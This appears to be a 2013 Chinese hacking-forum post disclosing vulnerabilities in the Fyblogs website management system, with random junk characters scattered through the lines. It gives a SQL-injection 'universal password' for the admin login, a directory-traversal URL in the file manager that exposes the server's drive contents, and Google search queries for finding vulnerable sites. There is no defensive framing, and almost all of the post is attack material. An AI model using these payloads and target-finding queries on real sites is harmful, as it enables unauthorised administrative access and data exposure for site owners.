找回密码
 立即注册
查看: 3006|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:17:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
后台万能密码 'or'='or'
) d7 T2 e/ i4 q* S! @/ |7 ^; P0 j* D8 E- O
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
/ n. c8 ^! u4 j. U" R' X, O& Gadmin/uploadfile.asp?currentFolder=/upfiles/../6 c0 A( i: ~/ q$ l9 a
, y. b' w1 A, K3 s2 m+ Y( u
漏洞证明:
" R: J8 ^& |3 J/ T7 v3 g0 Q2 x3 _) I* }
谷歌:inurl:type.asp?id=1 新闻中心3 u) m' A, S; e- K0 K# @
或者 :inurl:download_ok.asp?5 y' {% M1 |* {; D  T3 Z5 ~

+ O; V- S) \# o  T3 m$ A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表